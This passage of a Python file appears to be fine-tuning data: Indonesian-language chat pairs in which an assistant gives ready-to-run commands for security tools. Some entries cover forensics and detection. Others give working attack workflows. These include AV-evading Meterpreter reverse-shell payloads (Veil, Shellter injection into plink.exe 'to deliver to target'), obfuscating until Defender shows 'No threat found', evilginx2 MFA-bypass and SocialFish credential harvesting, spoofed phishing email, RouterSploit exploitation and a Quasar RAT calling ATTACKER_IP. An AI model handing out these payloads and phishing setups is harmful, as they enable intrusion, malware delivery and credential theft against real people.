    {"conversations": [{"from": "human", "value": "pake RsaCtfTool buat crack RSA dari CTF challenge"}, {"from": "gpt", "value": f"```bash\n# All attacks\npython3 {BASE}/crypto/RsaCtfTool/RsaCtfTool.py --publickey pub.pem --attack all\n\n# Decrypt file\npython3 {BASE}/crypto/RsaCtfTool/RsaCtfTool.py --publickey pub.pem --uncipherfile encrypted.txt --attack all\n\n# Multiple public keys (broadcast attack)\npython3 {BASE}/crypto/RsaCtfTool/RsaCtfTool.py --publickey '*.pem' --attack broadcast\n\n# Specific attacks\npython3 {BASE}/crypto/RsaCtfTool/RsaCtfTool.py --publickey pub.pem --attack wiener\npython3 {BASE}/crypto/RsaCtfTool/RsaCtfTool.py --publickey pub.pem --attack factordb\npython3 {BASE}/crypto/RsaCtfTool/RsaCtfTool.py --publickey pub.pem --attack fermat\n\n# Kasih n dan e langsung\npython3 {BASE}/crypto/RsaCtfTool/RsaCtfTool.py -n BIG_N -e 65537 --attack all\n```\nRsaCtfTool = one-stop-shop buat semua RSA attacks. Factordb + wiener + hastad semua ada bro."}]},

    {"conversations": [{"from": "human", "value": "pake hashID buat identify hash type"}, {"from": "gpt", "value": f"```bash\n# Single hash\npython3 {BASE}/crypto/hashID/hashid.py '5f4dcc3b5aa765d61d8327deb882cf99'\n\n# File berisi banyak hash\npython3 {BASE}/crypto/hashID/hashid.py -f hashes.txt\n\n# Dengan hashcat mode\npython3 {BASE}/crypto/hashID/hashid.py -m '5f4dcc3b5aa765d61d8327deb882cf99'\n# Output: MD5 [hashcat mode: 0]\n\n# Extended mode\npython3 {BASE}/crypto/hashID/hashid.py -e '$2y$10$abc123...'\n\n# haiti lebih akurat\npython3 {BASE}/crypto/haiti/haiti '5f4dcc3b5aa765d61d8327deb882cf99'\n\n# Langsung crack setelah identify\nhash='5f4dcc3b5aa765d61d8327deb882cf99'\nmode=$(python3 {BASE}/crypto/hashID/hashid.py -m $hash | grep -oP 'hashcat mode: \\K[0-9]+')\nhashcat -m $mode $hash rockyou.txt\n```"}]},

    {"conversations": [{"from": "human", "value": "pake haiti buat identify dan crack hash"}, {"from": "gpt", "value": f"```bash\n# Identify hash\npython3 {BASE}/crypto/haiti/haiti '5f4dcc3b5aa765d61d8327deb882cf99'\n# Output: MD5 (hashcat: 0) (john: raw-md5)\n\n# Identify dengan detail\npython3 {BASE}/crypto/haiti/haiti --extended '$2y$10$abc123'\n\n# Auto-crack dengan hashcat\npython3 {BASE}/crypto/haiti/haiti '5f4dcc3b5aa765d61d8327deb882cf99' --hashcat-only\n# Output: hashcat -m 0 hash.txt rockyou.txt\n\n# Identify dari file\npython3 {BASE}/crypto/haiti/haiti -f hashes.txt\n\n# haiti lebih smart dari hashID - fewer false positives bro\n# Langsung integrate ke workflow:\nhash='TARGET_HASH'\nmode=$(python3 {BASE}/crypto/haiti/haiti $hash | grep -oP 'hashcat: \\K[0-9]+')\necho $hash > /tmp/hash.txt\nhashcat -m $mode /tmp/hash.txt /usr/share/wordlists/rockyou.txt\n```"}]},

    {"conversations": [{"from": "human", "value": "buka CyberChef lokal untuk decode/encode data yang complex"}, {"from": "gpt", "value": f"```bash\n# Serve CyberChef locally\npython3 -m http.server 8888 --directory {BASE}/crypto/CyberChef/\n\n# Akses di browser: http://localhost:8888/CyberChef.html\n\n# Atau buka langsung file HTML\nxdg-open {BASE}/crypto/CyberChef/CyberChef.html\n\n# Useful CyberChef recipes:\n# Magic           - auto-detect dan decode\n# From Base64     - decode base64\n# From Hex        - decode hex\n# XOR Brute Force - brute XOR key\n# JWT Decode      - decode JWT\n# Extract URLs    - extract semua URLs\n# Defang URLs     - make URLs safe for sharing\n\n# CLI alternative: cyberchef-server\nnpx cyberchef-server -p 8080\ncurl -X POST localhost:8080 -H 'Content-Type: application/json' \\\n  -d '{{\"recipe\": \"From_Base64\", \"input\": \"aGVsbG8=\"}}'\n```\nCyberChef paling berguna buat multi-layer encoding/decoding di malware analysis bro."}]},

    # ══ DEFENSE ══════════════════════════════════════════════

    {"conversations": [{"from": "human", "value": "pake sigma buat convert detection rules ke format SIEM"}, {"from": "gpt", "value": f"```bash\n# Convert satu rule ke Splunk\npython3 sigma convert -t splunk \\\n  {BASE}/defense/sigma/rules/windows/lateral_movement/win_lateral_movement_via_wmi.yml\n\n# Convert ke Elasticsearch\npython3 sigma convert -t es-qs \\\n  {BASE}/defense/sigma/rules/windows/\n\n# pySigma (newer)\npip install pysigma pysigma-backend-splunk\npython3 -c \"\nfrom sigma.collection import SigmaCollection\nfrom sigma.backends.splunk import SplunkBackend\nsc = SigmaCollection.from_yaml(open('{BASE}/defense/sigma/rules/windows/process_creation/proc_creation_win_cmd_net_user_add.yml'))\nprint(SplunkBackend().convert(sc))\n\"\n\n# List semua rules categories\nls {BASE}/defense/sigma/rules/windows/\n```\nSigma = vendor-neutral SIEM rules. Convert satu rule ke Splunk, Elastic, QRadar, dll bro."}]},

    {"conversations": [{"from": "human", "value": "setup Zeek buat network traffic analysis"}, {"from": "gpt", "value": f"```bash\n# Zeek live capture\nsudo zeek -i eth0 /usr/share/zeek/site/local.zeek\n\n# Analyze pcap\nzeek -r capture.pcap /usr/share/zeek/site/local.zeek\n\n# Custom script dari local\nzeek -r capture.pcap {BASE}/defense/Zeek/local.zeek\n\n# Zeek logs yang dihasilkan:\n# conn.log   - all connections\n# http.log   - HTTP requests\n# dns.log    - DNS queries\n# ssl.log    - TLS info\n# files.log  - file transfers\n\n# Query dengan zeek-cut\nzeek-cut id.orig_h id.resp_h id.resp_p < conn.log | head -20\n\n# DNS exfil detection\nzeek-cut query < dns.log | awk 'length($0) > 50' | sort | uniq -c | sort -rn\n\n# Zeek package manager\nzkg install zeek-kafka  # export ke Kafka\nzkg list installed\n```\nZeek lebih powerful dari tcpdump untuk analysis bro. Log langsung structured JSON."}]},

    {"conversations": [{"from": "human", "value": "pake Wazuh buat SIEM dan security monitoring"}, {"from": "gpt", "value": f"```bash\n# Wazuh manager start\npython3 {BASE}/defense/Wazuh/wazuh-manager/bin/wazuh-control start\n\n# Atau via Docker (recommended)\ndocker-compose -f {BASE}/defense/Wazuh/docker/basic.yml up -d\n\n# Akses Kibana dashboard: https://localhost\n# Default: admin/SecretPassword\n\n# Install Wazuh agent di endpoint\n# Ubuntu:\ncurl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | apt-key add -\napt install wazuh-agent\n\n# Config agent /var/ossec/etc/ossec.conf:\n# <server><address>WAZUH_MANAGER_IP</address></server>\n\n# Wazuh CLI\n/var/ossec/bin/wazuh-control status\n/var/ossec/bin/agent_control -l  # list agents\n/var/ossec/bin/ossec-logtest     # test rules\n```\nWazuh = open source SIEM+XDR bro. Monitoring file integrity, log analysis, vulnerability detection."}]},

    {"conversations": [{"from": "human", "value": "pake YARA-Rules collection buat scan malware"}, {"from": "gpt", "value": f"```bash\n# Lihat rules yang tersedia\nls {BASE}/defense/YARA-Rules/\n\n# Scan file dengan semua rules\nyara {BASE}/defense/YARA-Rules/index.yar suspicious_file\n\n# Scan direktori\nyara {BASE}/defense/YARA-Rules/index.yar /var/www/html/ -r\n\n# Category spesifik\nyara {BASE}/defense/YARA-Rules/malware/MALW_Emotet.yar suspicious_file\nyara {BASE}/defense/YARA-Rules/RAT/*.yar suspicious_file\n\n# Compile dulu untuk speed\nyarac {BASE}/defense/YARA-Rules/ compiled.rules\nyara compiled.rules suspicious_file\n\n# Scan dengan verbose\nyara -s {BASE}/defense/YARA-Rules/index.yar suspicious_file\n# -s = print matching strings\n\n# Combine dengan find\nfind /tmp -type f | xargs yara {BASE}/defense/YARA-Rules/index.yar\n```\nYARA-Rules collection = database signatures malware community bro. Update regular dari GitHub."}]},

    # ══ EVASION ══════════════════════════════════════════════

    {"conversations": [{"from": "human", "value": "pake Veil buat generate payload yang bypass AV"}, {"from": "gpt", "value": f"```bash\npython3 {BASE}/evasion/Veil/Veil.py\n\n# Interactive menu:\n# 1. Veil-Evasion\n# 2. list (lihat semua payloads)\n# 3. use 1 (pilih payload Python/Meterpreter/Rev_TCP)\n# 4. set LHOST 192.168.1.10\n# 5. set LPORT 4444\n# 6. generate\n# 7. pilih output name: payload\n\n# Non-interactive\npython3 {BASE}/evasion/Veil/Veil.py --tool Evasion --payload python/meterpreter/rev_tcp \\\n  --ip 192.168.1.10 --port 4444 \\\n  --output payload\n\n# Setup listener\nmsfconsole -q -x \"use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.10; set LPORT 4444; run\"\n```\nVeil generate Python/C# payload yang di-encrypt, susah di-detect static AV bro."}]},

    {"conversations": [{"from": "human", "value": "pake charlotte buat generate shellcode payload"}, {"from": "gpt", "value": f"```bash\npython3 {BASE}/evasion/charlotte/charlotte.py -h\n\n# Generate shellcode\npython3 {BASE}/evasion/charlotte/charlotte.py \\\n  -p windows/x64/meterpreter/reverse_tcp \\\n  -l 192.168.1.10 \\\n  -o payload.exe\n\n# Custom shellcode\nmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f raw -o shellcode.bin\npython3 {BASE}/evasion/charlotte/charlotte.py \\\n  -s shellcode.bin \\\n  -o payload.exe\n\n# DLL output\npython3 {BASE}/evasion/charlotte/charlotte.py \\\n  -p windows/x64/meterpreter/reverse_tcp \\\n  -l 192.168.1.10 \\\n  -f dll \\\n  -o payload.dll\n```\nCharlotte encrypt shellcode dalam C++ loader, bypass signature-based AV bro."}]},

    {"conversations": [{"from": "human", "value": "pake Shellter buat inject shellcode ke PE legitimate"}, {"from": "gpt", "value": f"```bash\n# Shellter butuh wine di Linux\napt install wine\n\n# Auto mode\nwine {BASE}/evasion/Shellter/shellter.exe\n# Mode: A (auto)\n# PE Target: /usr/share/windows-binaries/plink.exe\n# Stealth: Y\n# Payload type: L (listed) atau C (custom)\n# Pick payload: 1 (Meterpreter_Reverse_TCP)\n# LHOST: 192.168.1.10\n# LPORT: 4444\n\n# Result: plink.exe yang sudah terinjeksi payload\n# Deliver ke target dan jalankan\n\n# Setup listener\nmsfconsole -q -x \"use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.10; set LPORT 4444; run\"\n```\nShellter inject ke existing PE = AV lihat legit binary, tapi payload tetap jalan bro."}]},

    {"conversations": [{"from": "human", "value": "pake AMSITrigger buat cek bagian mana dari PowerShell script yang trigger AMSI"}, {"from": "gpt", "value": f"```bash\n# AMSITrigger di WSL via wine atau di Windows\nwine {BASE}/evasion/AMSITrigger/AMSITrigger.exe -i payload.ps1\n\n# Format 3 = lebih detail\nwine {BASE}/evasion/AMSITrigger/AMSITrigger.exe -i payload.ps1 -f 3\n\n# String mode (detect specific strings)\nwine {BASE}/evasion/AMSITrigger/AMSITrigger.exe -i payload.ps1 -f 2\n\n# Output shows exactly which part gets flagged\n# Obfuscate that part, run again until clean\n\n# DefenderCheck untuk binary\nwine {BASE}/evasion/DefenderCheck/DefenderCheck.exe payload.exe\n\n# Combine workflow:\n# 1. AMSITrigger → find flagged lines\n# 2. Obfuscate those lines\n# 3. DefenderCheck → verify binary clean\n# 4. Deploy\n```\nIteratif: test → obfuscate → test lagi sampai 0 detections bro."}]},

    {"conversations": [{"from": "human", "value": "pake DefenderCheck buat cek apakah binary ketahuan Windows Defender"}, {"from": "gpt", "value": f"```bash\n# DefenderCheck di Windows atau via wine\nwine {BASE}/evasion/DefenderCheck/DefenderCheck.exe payload.exe\n\n# Output kasih: byte range yang trigger detection\n# Misalnya: Bytes 0x1234 to 0x5678 trigger detection\n\n# Patch bytes tersebut\npython3 << 'EOF'\nwith open('payload.exe', 'rb') as f:\n    data = bytearray(f.read())\n# XOR bytes yang trigger detection\nfor i in range(0x1234, 0x5679):\n    data[i] ^= 0x41  # XOR dengan key\nwith open('payload_patched.exe', 'wb') as f:\n    f.write(data)\nEOF\n\n# Test lagi\nwine {BASE}/evasion/DefenderCheck/DefenderCheck.exe payload_patched.exe\n\n# Kalau masih ada, iterasi lagi\n# Tujuan: output 'No threat found'\n```\nDefenderCheck lebih cepet dari upload ke VT buat iterasi obfuscation bro."}]},

    # ══ FORENSICS ══════════════════════════════════════════════

    {"conversations": [{"from": "human", "value": "pake volatility3 buat analisis Windows memory dump"}, {"from": "gpt", "value": f"```bash\n# Info dasar\npython3 {BASE}/forensics/volatility3/vol.py -f memory.dmp windows.info\n\n# Process list\npython3 {BASE}/forensics/volatility3/vol.py -f memory.dmp windows.pslist\n\n# Process tree\npython3 {BASE}/forensics/volatility3/vol.py -f memory.dmp windows.pstree\n\n# Network connections\npython3 {BASE}/forensics/volatility3/vol.py -f memory.dmp windows.netstat\n\n# Injected code detection\npython3 {BASE}/forensics/volatility3/vol.py -f memory.dmp windows.malfind\n\n# Command history\npython3 {BASE}/forensics/volatility3/vol.py -f memory.dmp windows.cmdline\n\n# Registry hives\npython3 {BASE}/forensics/volatility3/vol.py -f memory.dmp windows.registry.hivelist\n\n# Dump process\npython3 {BASE}/forensics/volatility3/vol.py -f memory.dmp windows.dumpfiles --pid 1234\n```\nShare `pslist` output bro — gw identifikasi mana yang suspicious."}]},

    {"conversations": [{"from": "human", "value": "setup autopsy buat disk image forensic analysis"}, {"from": "gpt", "value": f"```bash\n# Autopsy ada di:\nls {BASE}/forensics/autopsy/\n\n# Start Autopsy di Linux\nbash {BASE}/forensics/autopsy/unix/autopsy\n# Akses: http://localhost:9999/autopsy\n\n# Atau install autopsy GUI (Java-based)\napt install autopsy\nautopsy\n\n# Sleuth Kit CLI (bagian dari autopsy)\n# Create disk image dulu\ndd if=/dev/sdb of=/tmp/disk.img bs=4M status=progress\n\n# Analisis\nmmls /tmp/disk.img          # list partitions\nfls -r /tmp/disk.img        # list all files\nfls -r -o OFFSET /tmp/disk.img | grep '*'  # deleted files\nicat /tmp/disk.img INODE > recovered_file  # recover file\n\n# File carving\nforemost -i /tmp/disk.img -o /tmp/recovered/ -t all\n```\nAutopsy GUI paling mudah buat forensic investigation full bro."}]},

    {"conversations": [{"from": "human", "value": "pake chainsaw buat fast Windows event log analysis"}, {"from": "gpt", "value": f"```bash\n# Chainsaw hunt dengan sigma rules\n{BASE}/forensics/chainsaw/chainsaw hunt /path/to/evtx/ \\\n  --sigma {BASE}/defense/sigma/rules/windows/ \\\n  --mapping {BASE}/forensics/chainsaw/mappings/sigma-event-logs-all.yml \\\n  --output results.json\n\n# Search specific event\n{BASE}/forensics/chainsaw/chainsaw search \\\n  -t 'Event.System.EventID: 4624' \\\n  Security.evtx\n\n# Dump all events\n{BASE}/forensics/chainsaw/chainsaw dump \\\n  Security.evtx \\\n  --output dump.jsonl\n\n# Kalau binary belum compiled:\ncd {BASE}/forensics/chainsaw\ncargo build --release\n./target/release/chainsaw hunt /path/to/evtx/ --sigma ...\n\n# Filter hasil\ncat results.json | python3 -c \"\nimport json,sys\nfor e in [json.loads(l) for l in sys.stdin]:\n    print(e.get('Event',{{}}).get('System',{{}}).get('TimeCreated',''), e.get('title',''))\n\"\n```\nChainsaw = fastest way buat hunting threats di EVTX files bro."}]},

    {"conversations": [{"from": "human", "value": "pake LogonTracer buat visualize Windows logon activity dan detect lateral movement"}, {"from": "gpt", "value": f"```bash\n# LogonTracer setup\ncd {BASE}/forensics/LogonTracer\npip3 install -r requirements.txt\n\n# Start\npython3 {BASE}/forensics/LogonTracer/logontracer.py \\\n  -r Security.evtx \\\n  -z \\\n  -u admin\n\n# Akses: http://localhost:7474\n# Login: neo4j/password (or admin/admin)\n\n# Import multiple EVTX files\npython3 {BASE}/forensics/LogonTracer/logontracer.py \\\n  -r /path/to/evtx/ \\\n  -z -u admin\n\n# Export GraphML\npython3 {BASE}/forensics/LogonTracer/logontracer.py \\\n  -r Security.evtx \\\n  -z -u admin \\\n  --export logon_graph.graphml\n```\nLogonTracer visualize attack path di AD — lihat siapa login ke mana, kapan, dari mana bro."}]},

    {"conversations": [{"from": "human", "value": "pake KAPE buat forensic triage collection dari Windows machine"}, {"from": "gpt", "value": f"```bash\n# KAPE di Windows (butuh admin)\n# Binary ada di:\nls {BASE}/forensics/KAPE/\n\n# Collect artifacts\n{BASE}/forensics/KAPE/kape.exe \\\n  --tsource C: \\\n  --tdest C:\\Evidence \\\n  --target !SANS_Triage\n\n# Dengan module (parse artifacts)\n{BASE}/forensics/KAPE/kape.exe \\\n  --tsource C: \\\n  --tdest C:\\Evidence \\\n  --target !SANS_Triage \\\n  --module !EZParser\n\n# Via WSL (kalau file udah dikumpulin)\n{BASE}/forensics/KAPE/kape.exe \\\n  --msource /path/to/evidence \\\n  --mdest /path/to/output \\\n  --module !EZParser\n\n# Target yang berguna:\n# !SANS_Triage - comprehensive triage\n# EventLogs - Windows event logs\n# Prefetch - program execution\n# RegistryHives - registry\n# BrowserHistory - browser artifacts\n```\nKAPE + SANS Triage = comprehensive evidence collection dalam menit bro."}]},

    # ══ MALWARE ══════════════════════════════════════════════

    {"conversations": [{"from": "human", "value": "pake yarGen buat auto-generate YARA rules dari malware samples"}, {"from": "gpt", "value": f"```bash\npython3 {BASE}/malware/yarGen/yarGen.py -h\n\n# Generate rules dari folder samples\npython3 {BASE}/malware/yarGen/yarGen.py \\\n  -m malware_samples/ \\\n  -o generated_rules.yar\n\n# Exclude goodware strings\npython3 {BASE}/malware/yarGen/yarGen.py \\\n  -m malware_samples/ \\\n  --excludegoodware \\\n  -o clean_rules.yar\n\n# Update goodware DB dulu\npython3 {BASE}/malware/yarGen/yarGen.py --update\n\n# Single file\npython3 {BASE}/malware/yarGen/yarGen.py \\\n  -m malware_samples/suspicious.exe \\\n  -o single_rule.yar\n\n# Test rule yang dihasilkan\nyara generated_rules.yar malware_samples/ -r\nyara generated_rules.yar /path/to/scan/ -r 2>/dev/null | grep MATCH\n```\nYarGen auto-extract unique strings dari malware = ready-to-deploy YARA rules bro."}]},

    {"conversations": [{"from": "human", "value": "pake maltrail buat detect malicious network traffic"}, {"from": "gpt", "value": f"```bash\n# Start maltrail server\npython3 {BASE}/malware/maltrail/server.py\n# Web UI: http://localhost:8338\n# Default login: admin/changeme!\n\n# Start sensor (monitoring)\nsudo python3 {BASE}/malware/maltrail/sensor.py\n\n# Analyze pcap file\npython3 {BASE}/malware/maltrail/sensor.py -i capture.pcap\n\n# Config\ncat {BASE}/malware/maltrail/maltrail.conf\n# Edit: LISTEN_INTERFACE, UDP_ADDRESS, dll\n\n# Maltrail detects:\n# - Known malicious domains/IPs (threat intel feeds)\n# - Suspicious user agents\n# - DGA domains (pattern-based)\n# - Tor exit nodes\n# - Cryptocurrency mining traffic\n# - RAT C2 patterns\n\n# View alerts\ntail -f /var/log/maltrail/maltrail.log\n```\nMaltrail passive monitoring — gak perlu install di endpoint, cukup di network level bro."}]},

    {"conversations": [{"from": "human", "value": "setup CAPEv2 sandbox buat automated malware analysis"}, {"from": "gpt", "value": f"```bash\n# CAPEv2 setup (butuh Ubuntu VM + VirtualBox)\ncd {BASE}/malware/CAPEv2\n\n# Install dependencies\nbash utils/rooter.sh\npip3 install -r requirements/host.txt\n\n# Start services\npython3 cuckoo.py &\npython3 web/manage.py runserver 0.0.0.0:8000 &\n\n# Submit sample\npython3 utils/submit.py malware.exe\n\n# Via API\ncurl -X POST http://localhost:8090/tasks/create/file \\\n  -F 'file=@malware.exe' \\\n  -F 'options=procmemdump=yes'\n\n# Get report\ncurl http://localhost:8090/tasks/report/1 > report.json\n\n# Web UI\n# http://localhost:8000\n\n# Alternative quick sandbox:\n# any.run (online)\n# https://app.any.run/\n\n# Download dari MalwareBazaar\ncurl -X POST 'https://mb-api.abuse.ch/api/v1/' --data 'query=get_file&sha256_hash=HASH' -o sample.zip\n```\nCAPEv2 full dynamic analysis: behavior, network, memory, screenshots bro."}]},

    {"conversations": [{"from": "human", "value": "pake Quasar RAT untuk authorized red team C2 di lab environment"}, {"from": "gpt", "value": f"```bash\n# Quasar RAT - C2 framework (authorized use only)\n# Build dari source di Windows:\ncd {BASE}/malware/Quasar\n# Open Quasar.sln di Visual Studio\n# Build solution\n\n# Atau run server di WSL via wine/mono\nmono {BASE}/malware/Quasar/Quasar.Server/bin/Release/Quasar.Server.exe\n\n# Features:\n# - Remote shell\n# - File manager\n# - Process manager\n# - Registry editor\n# - Remote desktop\n# - Keylogger\n# - Password recovery\n\n# Client config (buat di server):\n# Host: ATTACKER_IP\n# Port: 4782\n# Password: set password\n# Output: QuasarClient.exe\n\n# Deploy client ke target (authorized lab)\n# Target konek ke server Quasar\n```\nQuasar RAT buat authorized red team lab testing bro. Real C2 simulation untuk defensive testing."}]},

    # ══ SOCIAL ══════════════════════════════════════════════

    {"conversations": [{"from": "human", "value": "setup GoPhish buat authorized phishing campaign"}, {"from": "gpt", "value": f"```bash\n# Start GoPhish\n{BASE}/social/GoPhish/gophish\n# Atau\nchmod +x {BASE}/social/GoPhish/gophish\n./{BASE}/social/GoPhish/gophish\n\n# Default: https://localhost:3333\n# Login: admin/gophish (ganti setelah login!)\n\n# Setup flow via web UI:\n# 1. Sending Profiles → SMTP config\n# 2. Landing Pages → create fake login page\n# 3. Email Templates → phishing email\n# 4. Users & Groups → import target list CSV\n# 5. Campaigns → launch!\n\n# API\ncurl -k 'https://localhost:3333/api/campaigns?api_key=API_KEY'\n\n# Import targets CSV format:\n# First Name,Last Name,Email,Position\n# John,Doe,j.doe@target.com,IT Staff\n\n# Stats: email opened, link clicked, creds submitted\n```\nGoPhish = professional phishing platform bro. Tracking lengkap untuk authorized assessment."}]},

    {"conversations": [{"from": "human", "value": "setup evilginx2 buat capture credentials dan bypass MFA"}, {"from": "gpt", "value": f"```bash\n# Build evilginx2\ncd {BASE}/social/evilginx2\ngo build\n\n# Start\nsudo ./{BASE}/social/evilginx2/evilginx\n\n# Config\n[evilginx] > config domain phishing.yourdomain.com\n[evilginx] > config ip YOUR_SERVER_IP\n\n# List phishlets\n[evilginx] > phishlets\n\n# Setup phishlet\n[evilginx] > phishlets hostname linkedin phishing.yourdomain.com\n[evilginx] > phishlets enable linkedin\n\n# Create lure URL\n[evilginx] > lures create linkedin\n[evilginx] > lures get-url 0  # copy URL ini\n\n# Monitor sessions (credentials + cookies)\n[evilginx] > sessions\n[evilginx] > sessions 1\n\n# DNS setup di domain registrar:\n# A record: *.phishing.yourdomain.com → YOUR_IP\n```\nEvilginx bypass MFA karena capture real session cookie bro. Authorized assessment only."}]},

    {"conversations": [{"from": "human", "value": "pake SocialFish buat credential harvesting dari social media templates"}, {"from": "gpt", "value": f"```bash\n# Install dependencies\npip3 install -r {BASE}/social/SocialFish/requirements.txt\n\n# Start SocialFish\npython3 {BASE}/social/SocialFish/SocialFish.py\n\n# Atau dengan specific template\npython3 {BASE}/social/SocialFish/SocialFish.py Instagram\npython3 {BASE}/social/SocialFish/SocialFish.py Facebook\npython3 {BASE}/social/SocialFish/SocialFish.py LinkedIn\n\n# Available templates:\nls {BASE}/social/SocialFish/sites/\n# instagram, facebook, linkedin, twitter, github, dll\n\n# Expose via ngrok\nngrok http 8080\n# Share ngrok URL ke target\n\n# Credentials tersave di:\ncat {BASE}/social/SocialFish/creds.txt\n\n# Custom template\n# Copy folder template existing, modifikasi HTML buat target spesifik\ncp -r {BASE}/social/SocialFish/sites/instagram {BASE}/social/SocialFish/sites/custom_corp\n# Edit index.html sesuai target\n```\nSocialFish untuk authorized social engineering testing bro. Tracks IP + credentials."}]},

    {"conversations": [{"from": "human", "value": "pake PhEmail buat kirim targeted phishing emails"}, {"from": "gpt", "value": f"```bash\n# PhEmail setup\npip3 install -r {BASE}/social/PhEmail/requirements.txt\n\n# Single target\npython3 {BASE}/social/PhEmail/phEmail.py \\\n  --target victim@target.com \\\n  --smtp smtp.yourserver.com \\\n  --from noreply@legitimate-looking.com \\\n  --subject 'Urgent: Password Reset' \\\n  --body email_template.html\n\n# Mass campaign dari CSV\npython3 {BASE}/social/PhEmail/phEmail.py \\\n  --targets targets.csv \\\n  --smtp smtp.yourserver.com \\\n  --from hr@company.com \\\n  --template phishing_template.html\n\n# Targets CSV format:\n# email,name,department\n# user@target.com,John Doe,IT\n\n# Track opens (embed tracking pixel)\n# <img src='http://TRACKER_SERVER/pixel.png?id={{email}}' width='1' height='1'>\n```\nPhEmail untuk authorized phishing simulation bro. Integrate dengan GoPhish untuk full campaign tracking."}]},

    # ══ IOT ══════════════════════════════════════════════

    {"conversations": [{"from": "human", "value": "pake RouterSploit buat scan dan exploit router yang vulnerable"}, {"from": "gpt", "value": f"```bash\n# Start RouterSploit\npython3 {BASE}/iot/RouterSploit/rsf.py\n\n# Autopwn scan (cek semua known exploits)\nrsf > use scanners/autopwn\nrsf (scanners/autopwn) > set target 192.168.1.1\nrsf (scanners/autopwn) > run\n\n# Default credentials scan\nrsf > use creds/routers/multi_creds\nrsf (creds/routers/multi_creds) > set target 192.168.1.1\nrsf (creds/routers/multi_creds) > run\n\n# Brand-specific\nrsf > use exploits/routers/cisco/\nrsf > use exploits/routers/dlink/\nrsf > use exploits/routers/asus/\n\n# List all\nrsf > show exploits\n\n# Specific exploit\nrsf > use exploits/routers/dlink/dvg_n5402sp_rce\nrsf (exploits/..) > set target 192.168.1.1\nrsf (exploits/..) > check  # cek dulu\nrsf (exploits/..) > run\n```\nRouterSploit = metasploit untuk IoT/router devices bro."}]},

    {"conversations": [{"from": "human", "value": "pake binwalk buat extract dan analisis firmware IoT"}, {"from": "gpt", "value": f"```bash\n# Analyze firmware\nbinwalk firmware.bin\n\n# Extract\nbinwalk -e firmware.bin\nbinwalk -Me firmware.bin  # recursive extract\n\n# Dengan output directory\nbinwalk -e firmware.bin --directory extracted/\n\n# Entropy analysis\nbinwalk -E firmware.bin  # plot entropy graph\n\n# Custom signature\nbinwalk -B 'magic_signature' firmware.bin\n\n# String search\nbinwalk -R 'password' firmware.bin\nbinwalk -R 'admin' firmware.bin\n\n# Kalau binwalk system gak ada:\npython3 -m pip install binwalk\npython3 -c \"import binwalk; binwalk.scan('firmware.bin', signature=True, quiet=True)\"\n\n# Atau dari source\npython3 {BASE}/iot/binwalk/src/binwalk/__main__.py firmware.bin\n```\nSetelah extract, cari di folder `_firmware.bin.extracted/` untuk filesystem dan scripts bro."}]},

    {"conversations": [{"from": "human", "value": "pake firmwalker buat cari credentials dan sensitive files dalam firmware"}, {"from": "gpt", "value": f"```bash\n# Jalanin firmwalker setelah extract firmware\nbash {BASE}/iot/firmwalker/firmwalker.sh extracted_firmware/\n\n# Cari password files\nbash {BASE}/iot/firmwalker/firmwalker.sh extracted_firmware/ 2>/dev/null | grep -i 'password\\|passwd'\n\n# Cari SSL certificates/private keys\nbash {BASE}/iot/firmwalker/firmwalker.sh extracted_firmware/ 2>/dev/null | grep -i 'ssl\\|cert\\|key\\|\\.pem'\n\n# Cari hardcoded credentials\nbash {BASE}/iot/firmwalker/firmwalker.sh extracted_firmware/ 2>/dev/null | grep -iE 'admin|root|secret'\n\n# Manual grep buat lebih specific\ngrep -r 'password' extracted_firmware/ --include='*.conf' --include='*.cfg' -l\nfind extracted_firmware/ -name '*.key' -o -name '*.pem' 2>/dev/null\nfind extracted_firmware/ -name 'passwd' -o -name 'shadow' 2>/dev/null\n\n# Combine dengan EMBA\nbash {BASE}/iot/emba/emba.sh -f firmware.bin -l /tmp/emba_output\n```\nFirmwalker quick scan, EMBA lebih comprehensive. Pakai keduanya bro."}]},

    {"conversations": [{"from": "human", "value": "pake FACT_core buat automated firmware analysis"}, {"from": "gpt", "value": f"```bash\n# FACT_core setup\ncd {BASE}/iot/FACT_core\npip3 install -r requirements.txt\nbash install/install.sh\n\n# Start FACT\npython3 {BASE}/iot/FACT_core/start_fact.py\n# Web UI: http://localhost:5000\n\n# Submit firmware via web UI:\n# Upload → pilih file → submit\n\n# Via API\ncurl -X PUT http://localhost:5000/rest/firmware \\\n  -H 'Content-Type: application/json' \\\n  -d '{{\"binary\": \"BASE64_FIRMWARE\", \"file_name\": \"firmware.bin\"}}'\n\n# FACT analyzes:\n# - Software components & versions\n# - Known CVEs di components\n# - Hardcoded credentials\n# - Crypto weaknesses\n# - Binary exploitation opportunities\n# - Network services exposed\n\n# Get analysis results\ncurl http://localhost:5000/rest/analysis/FIRMWARE_UID\n```\nFACT = most comprehensive IoT firmware analysis platform bro. Butuh waktu tapi hasil lengkap."}]},

    {"conversations": [{"from": "human", "value": "pake EMBA buat full firmware security analysis"}, {"from": "gpt", "value": f"```bash\n# EMBA - Embedded Firmware Analyzer\nsudo bash {BASE}/iot/emba/emba.sh -h\n\n# Basic analysis\nsudo bash {BASE}/iot/emba/emba.sh \\\n  -f firmware.bin \\\n  -l /tmp/emba_logs\n\n# Dengan QEMU emulation\nsudo bash {BASE}/iot/emba/emba.sh \\\n  -f firmware.bin \\\n  -l /tmp/emba_logs \\\n  -q\n\n# Dengan network scan\nsudo bash {BASE}/iot/emba/emba.sh \\\n  -f firmware.bin \\\n  -l /tmp/emba_logs \\\n  -n\n\n# View HTML report\npython3 -m http.server 8080 --directory /tmp/emba_logs\n# Akses: http://localhost:8080\n\n# EMBA detects:\n# - CVEs in installed packages\n# - Hardcoded credentials\n# - Weak crypto\n# - SUID binaries\n# - Exposed services\n# - Backdoors\n```\nEMBA all-in-one, paling lengkap buat IoT firmware assessment bro. Setup butuh waktu tapi worth it."}]},

]

if __name__ == '__main__':
    print(f"TOOLS_EXEC_DATA: {len(TOOLS_EXEC_DATA)} entries")
    cats = {}
    for e in TOOLS_EXEC_DATA:
        q = e['conversations'][0]['value']
        for cat in ['recon','scan','web','exploit','post','brute','wireless','cloud','crypto','defense','evasion','forensics','malware','social','iot']:
